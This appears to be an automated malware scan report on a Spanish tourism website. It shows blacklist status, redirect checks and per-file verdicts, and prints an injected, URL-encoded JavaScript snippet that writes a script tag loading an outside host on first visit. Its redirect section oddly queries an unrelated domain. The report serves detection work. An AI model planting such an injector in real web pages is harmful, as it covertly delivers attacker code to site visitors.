Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--montaadealicante-bub.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: resume-cv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 20:45:08 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.26
GET / HTTP/1.1
Host: resume-cv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 20:45:08 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: resume-cv.com
Referer: http://www.google.com/search?q=resume-cv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: resume-cv.com
Referer: http://www.google.com/search?q=resume-cv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://xn--montaadealicante-bub.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:14 GMT Location: http://www.xn--montaadealicante-bub.com/ Server: Microsoft-IIS/7.0 Content-Length: 250 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/ | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:14 GMT Location: http://www.muntanyadalacant.com/ Server: Microsoft-IIS/7.0 Content-Length: 155 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/ | 200 OK Content-Length: 12982 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/js/jquery-1.12.js | 200 OK Content-Length: 20976 Content-Type: text/javascript | clean |
http://xn--montaadealicante-bub.com/js/jquery.tabs.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:17 GMT Location: http://www.xn--montaadealicante-bub.com/js/jquery.tabs.js Server: Microsoft-IIS/7.0 Content-Length: 267 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/js/jquery.tabs.js | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:17 GMT Location: http://www.muntanyadalacant.com/js/jquery.tabs.js Server: Microsoft-IIS/7.0 Content-Length: 172 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/js/jquery.tabs.js | 200 OK Content-Length: 2747 Content-Type: text/javascript | clean |
http://xn--montaadealicante-bub.com/js/general_fns.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.xn--montaadealicante-bub.com/js/general_fns.js Server: Microsoft-IIS/7.0 Content-Length: 267 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/js/general_fns.js | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.muntanyadalacant.com/js/general_fns.js Server: Microsoft-IIS/7.0 Content-Length: 172 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/js/general_fns.js | 200 OK Content-Length: 5440 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#container-1').tabs({fxFade: true, fxSpeed: 'fast'}); $('#container-2').tabs({fxFade: true, fxSpeed: 'fast'}); $("#termino").click(function(){ $("#termino").attr("value",""); }); $("a[@rel='external']").click(function(){this.target = "_blank";}); }); function embedFlash(ubicacion,pelicula,ancho,alto){ document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macro if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://xn--montaadealicante-bub.com/index.php?idioma=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.xn--montaadealicante-bub.com/index.php?idioma=1 Server: Microsoft-IIS/7.0 Content-Length: 268 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/index.php?idioma=1 | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:19 GMT Location: http://www.muntanyadalacant.com/index.php Server: Microsoft-IIS/7.0 Content-Length: 164 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/index.php | 200 OK Content-Length: 12996 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=1 | 200 OK Content-Length: 13004 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=2 | 200 OK Content-Length: 12122 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=3 | 200 OK Content-Length: 12028 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=1 | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=2 | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=3 | 200 OK Content-Length: 9925 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php | 200 OK Content-Length: 10837 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php?idioma=1 | 200 OK Content-Length: 10967 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php?idioma=2 | 200 OK Content-Length: 10057 Content-Type: text/html | clean |